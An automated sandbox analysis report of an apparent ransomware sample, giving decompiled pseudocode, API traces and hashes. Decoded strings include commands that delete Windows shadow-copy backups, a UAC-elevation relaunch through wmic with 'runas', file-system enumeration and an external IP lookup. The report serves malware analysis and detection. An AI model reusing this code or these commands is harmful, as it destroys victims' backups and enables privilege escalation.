VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,746566A0,?), ref: 00D7690F
lstrlenW.KERNEL32(00D803AC), ref: 00D7691C

Part of subcall function 00D77A00: InternetCloseHandle.WININET(?), ref: 00D77A13
Part of subcall function 00D77A00: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00D77A32

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,00D803B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 00D7694B
wsprintfW.USER32 ref: 00D76963
VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,00D803B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 00D76979
InternetCloseHandle.WININET(?), ref: 00D76987

Strings

ipv4bot.whatismyipaddress.com, xrefs: 00D7693C
GET, xrefs: 00D76924

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: e6e784c24563c08bddbfedac2856a784da7ac636b1df5ff90199d1827221c335
Instruction ID: 094f1416c78add9c2a54e9a2ca48ec804e5efc175c98db9467a020fd9655b511
Opcode Fuzzy Hash: e6e784c24563c08bddbfedac2856a784da7ac636b1df5ff90199d1827221c335
Instruction Fuzzy Hash: F6019E366443017BDB207B669C5EF9FBE78AB81B11F444024FA0DE12C0FE609559C7B9

Uniqueness

Uniqueness Score: -1.00%

Function 00D766F0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00D766F0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E00D764A0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E00D76640(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if((_v616.dwFileAttributes & 0x00000010) == 0) {
										_v16 =  *_t54;
										_t46 = E00D763B0(_t63,  &_v616, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E00D766F0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x00d766fc
0x00d766ff
0x00d76701
0x00d76708
0x00d76836
0x00d76836
0x00d7683c
0x00d7671d
0x00d7671d
0x00d76735
0x00d76738
0x00d7673b
0x00d76745
0x00d7674b
0x00d7674d
0x00d76750
0x00d76756
0x00d76764
0x00d76770
0x00d7677c
0x00d76782
0x00d76784
0x00d76796
0x00d7679c
0x00d7679e
0x00d767a8
0x00d767aa
0x00d767b1
0x00d767e2
0x00d767e5
0x00d767ea
0x00d767ed
0x00d767ef
0x00d767f2
0x00d767f5
0x00d767f7
0x00d76800
0x00d76800
0x00d76803
0x00d76803
0x00d767f9
0x00d767fc
0x00d767fe
0x00000000
0x00000000
0x00d767fe
0x00d767f7
0x00d767b3
0x00d767c7
0x00d767cc
0x00d767cc
0x00d7680e
0x00d7680e
0x00d76810
0x00d76810
0x00d7679e
0x00d7681d
0x00d76823
0x00d76823
0x00d7682e
0x00000000
0x00d76758
0x00d76763
0x00d76763
0x00d76756

APIs

Part of subcall function 00D76110: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00D76706,00000000,?,?), ref: 00D76123
Part of subcall function 00D76110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00D76706,00000000,?,?), ref: 00D761AE
Part of subcall function 00D76110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00D76706,00000000,?,?), ref: 00D761C8
Part of subcall function 00D76110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00D76706,00000000,?,?), ref: 00D761E2
Part of subcall function 00D76110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00D76706,00000000,?,?), ref: 00D761FC
Part of subcall function 00D76110: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00D76706,00000000,?,?), ref: 00D7621C

Part of subcall function 00D764A0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00D764B2
Part of subcall function 00D764A0: lstrcatW.KERNEL32(00000000,00D80364), ref: 00D764C4
Part of subcall function 00D764A0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00D764D2
Part of subcall function 00D764A0: lstrcmpW.KERNEL32(?,00D80368,?,?), ref: 00D764FC
Part of subcall function 00D764A0: lstrcmpW.KERNEL32(?,00D8036C,?,?), ref: 00D76512
Part of subcall function 00D764A0: lstrcatW.KERNEL32(00000000,?), ref: 00D76524
Part of subcall function 00D764A0: lstrlenW.KERNEL32(00000000,?,?), ref: 00D7652B
Part of subcall function 00D764A0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 00D7655A
Part of subcall function 00D764A0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00D76571
Part of subcall function 00D764A0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 00D7657C
Part of subcall function 00D764A0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 00D7659A
Part of subcall function 00D764A0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 00D765AF

Part of subcall function 00D76640: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00D76722,00000000,?,?), ref: 00D76655
Part of subcall function 00D76640: wsprintfW.USER32 ref: 00D76663
Part of subcall function 00D76640: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 00D7667F
Part of subcall function 00D76640: GetLastError.KERNEL32(?,?), ref: 00D7668C
Part of subcall function 00D76640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 00D766D8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00D76723
lstrcatW.KERNEL32(00000000,00D80364), ref: 00D7673B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00D76745
lstrcmpW.KERNEL32(?,00D80368,?,?), ref: 00D7677C
lstrcmpW.KERNEL32(?,00D8036C,?,?), ref: 00D76796
lstrcatW.KERNEL32(00000000,?), ref: 00D767A8
lstrcatW.KERNEL32(00000000,00D8039C), ref: 00D767B9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 00D7681D
FindClose.KERNEL32(00003000,?,?), ref: 00D7682E

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
String ID:
API String ID: 1112924665-0
Opcode ID: 65e1b64f293ded13dc85eb9db00f90d7dee3b090f4edcaba5edb06d1639f31dc
Instruction ID: a2861316aa829492603fc2d7f513873586d920304f2cae8530f78e0d42c5789d
Opcode Fuzzy Hash: 65e1b64f293ded13dc85eb9db00f90d7dee3b090f4edcaba5edb06d1639f31dc
Instruction Fuzzy Hash: 4E314D72A00719ABCF14AF64DC84AADBBB8FF44714B448596F90DE6250FB30DA44CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D777F0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D777F0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x00d77808
0x00d77814
0x00d7781f
0x00d77829
0x00d77833
0x00d7783d
0x00d77847
0x00d77851
0x00d7785b
0x00d77865
0x00d7786f
0x00d77879
0x00d77883
0x00d7788d
0x00d77897
0x00d778a1
0x00d778ab
0x00d778b5
0x00d778bf
0x00d778c9
0x00d778d3
0x00d778dd
0x00d778e7
0x00d778f1
0x00d778fb
0x00d77902
0x00d77909
0x00d77910
0x00d77917
0x00d7791e
0x00d77925
0x00d7792c
0x00d77933
0x00d7793a
0x00d77941
0x00d77948
0x00d7794f
0x00d77956
0x00d7795d
0x00d77964
0x00d7796b
0x00d77972
0x00d77979
0x00d77980
0x00d77987
0x00d7798e
0x00d77995
0x00d7799c
0x00d779a3
0x00d779aa
0x00d779b1
0x00d779b8
0x00d779bf
0x00d779c6
0x00d779cd
0x00d779d4
0x00d779d6
0x00d779db
0x00d779ed
0x00d779ef
0x00000000
0x00d779ef
0x00d779f8

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D779D4
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 00D779ED

Strings

i, xrefs: 00D779B8
., xrefs: 00D77987
5, xrefs: 00D7783D
, xrefs: 00D77933
8, xrefs: 00D7799C
M, xrefs: 00D77814
, xrefs: 00D779A3
c, xrefs: 00D7794F
7, xrefs: 00D779C6
w, xrefs: 00D7786F
, xrefs: 00D778A1
T, xrefs: 00D77883
, xrefs: 00D77917
5, xrefs: 00D77979
K, xrefs: 00D778F1
i, xrefs: 00D7793A
p, xrefs: 00D778D3
(, xrefs: 00D77851
, xrefs: 00D7795D
e, xrefs: 00D77972
A, xrefs: 00D778C9
5, xrefs: 00D779BF
K, xrefs: 00D7791E
1, xrefs: 00D77897
3, xrefs: 00D779CD
a, xrefs: 00D779B1
), xrefs: 00D778BF
d, xrefs: 00D77865
l, xrefs: 00D77829
, xrefs: 00D77879
o, xrefs: 00D77956
6, xrefs: 00D7788D
0, xrefs: 00D77847
3, xrefs: 00D77910
3, xrefs: 00D77995
e, xrefs: 00D77941
z, xrefs: 00D7781F
a, xrefs: 00D779AA
5, xrefs: 00D77902
t, xrefs: 00D778FB
T, xrefs: 00D77925
8, xrefs: 00D7798E
O, xrefs: 00D778AB
7, xrefs: 00D77909
i, xrefs: 00D7785B
L, xrefs: 00D7792C
a, xrefs: 00D77833
G, xrefs: 00D77948
e, xrefs: 00D778E7
h, xrefs: 00D77964
e, xrefs: 00D778DD
o, xrefs: 00D7796B
., xrefs: 00D77980
6, xrefs: 00D778B5

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: 5a0f6c2d68393512fd1939dcfcdfd37ea3d4ab5d645b4f12260ead8cfc8c8d68
Instruction ID: 09abaad9d08cf79da55f3805df43fb725670e258c847bf14f3d74516c90ce65b
Opcode Fuzzy Hash: 5a0f6c2d68393512fd1939dcfcdfd37ea3d4ab5d645b4f12260ead8cfc8c8d68
Instruction Fuzzy Hash: A941A8B4811368DEEB21CF9199987DEBFF5BB04748F50819ED5086B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D74330 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00D74330(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E00D73AE0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x00d74346
0x00d743e2
0x00d743ec
0x00d743f4
0x00d743fc
0x00d74400
0x00d74408
0x00d7440c
0x00d74414
0x00d74419
0x00d74421
0x00d74429
0x00d74431
0x00d74439
0x00d74441
0x00d74449
0x00d74454
0x00d7445f
0x00d7446a
0x00d74475
0x00d74480
0x00d7448b
0x00d74496
0x00d744a1
0x00d744ac
0x00d744b7
0x00d744c2
0x00d744cd
0x00d7434c
0x00d7434e
0x00d74356
0x00d7435e
0x00d74362
0x00d7436a
0x00d7436e
0x00d74376
0x00d7437e
0x00d74386
0x00d7438e
0x00d74393
0x00d7439b
0x00d743a3
0x00d743ab
0x00d743b3
0x00d743bb
0x00d743c3
0x00d743cb
0x00d743d3
0x00d743d3
0x00d744e6
0x00d744f5
0x00d744f9
0x00d74505
0x00d7450d
0x00d74523
0x00d7452b
0x00d7452d
0x00d744fb
0x00d744fb
0x00d744fb
0x00d74537
0x00d74545

APIs

Part of subcall function 00D73AE0: _memset.LIBCMT ref: 00D73B32
Part of subcall function 00D73AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00D73B56
Part of subcall function 00D73AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00D73B5A
Part of subcall function 00D73AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00D73B5E
Part of subcall function 00D73AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00D73B85

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 00D744EF
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 00D74505
lstrcatW.KERNEL32(00000000,0063005C), ref: 00D7450D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 00D74523
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D74537

Strings

, xrefs: 00D743BB
., xrefs: 00D7437E
m, xrefs: 00D74439
e, xrefs: 00D743D3
e, xrefs: 00D743C3
\, xrefs: 00D743E2
x, xrefs: 00D74386
o, xrefs: 00D743A3
i, xrefs: 00D74376
s, xrefs: 00D74393
/, xrefs: 00D74419
, xrefs: 00D7446A
d, xrefs: 00D74449
h, xrefs: 00D74475
a, xrefs: 00D74431
e, xrefs: 00D743CB
b, xrefs: 00D74356
p, xrefs: 00D743B3
e, xrefs: 00D744CD
s, xrefs: 00D74429
t, xrefs: 00D7445F
w, xrefs: 00D7448B
\, xrefs: 00D7434E
n, xrefs: 00D74441
/, xrefs: 00D744B7
open, xrefs: 00D7451C
a, xrefs: 00D744A1
x, xrefs: 00D7440C
c, xrefs: 00D743AB
l, xrefs: 00D74454
m, xrefs: 00D743EC
w, xrefs: 00D7436E
l, xrefs: 00D744AC
a, xrefs: 00D7439B
m, xrefs: 00D74362
., xrefs: 00D74400
, xrefs: 00D74421
u, xrefs: 00D744C2
d, xrefs: 00D74480
, xrefs: 00D74496

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: a9687b486e972832c50bda6b0b45bbf99d1cb4c3fb8f3b5ac9e54ca43beea856
Instruction ID: ef0c82597b43d726c8bce93e8e98adc8a3052dee9734c3c12103785eedf101a1
Opcode Fuzzy Hash: a9687b486e972832c50bda6b0b45bbf99d1cb4c3fb8f3b5ac9e54ca43beea856
Instruction Fuzzy Hash: 15411BB0148380DFE3208F119859B5BBFE2BB85B49F10491CF6985A291D7F6858CCFA7

Uniqueness

Uniqueness Score: -1.00%

Function 00D73BA0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D73BA0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E00D73AE0(__edx);
				if(_t54 != 0) {
					_t54 = E00D73A60();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x00d73baf
0x00d73bb1
0x00d73bb8
0x00d73bbe
0x00d73bc5
0x00d73bd7
0x00d73be4
0x00d73bed
0x00d73bf5
0x00d73bfd
0x00d73c05
0x00d73c0d
0x00d73c15
0x00d73c1d
0x00d73c25
0x00d73c2d
0x00d73c35
0x00d73c3d
0x00d73c45
0x00d73c4d
0x00d73c58
0x00d73c68
0x00d73c71
0x00d73c79
0x00d73c81
0x00d73c89
0x00d73c91
0x00d73c99
0x00d73ca1
0x00d73ca9
0x00d73cb4
0x00d73cbf
0x00d73cca
0x00d73cd5
0x00d73ce0
0x00d73ceb
0x00d73cf6
0x00d73d01
0x00d73d0c
0x00d73d17
0x00d73d31
0x00d73d33
0x00d73d39
0x00d73d40
0x00d73d4c
0x00d73d4e
0x00d73d55
0x00d73d5d
0x00d73d65
0x00d73d6d
0x00d73d77
0x00d73d81
0x00d73d84
0x00d73d8b
0x00d73d92
0x00d73da0
0x00d73da1
0x00d73da5
0x00000000
0x00000000
0x00d73da7
0x00d73dab
0x00000000
0x00000000
0x00d73db4
0x00000000
0x00d73db4
0x00d73dc6
0x00d73dcf
0x00d73dd7
0x00d73dd7
0x00d73bc5
0x00d73dba
0x00d73dc0

APIs

Part of subcall function 00D73AE0: _memset.LIBCMT ref: 00D73B32
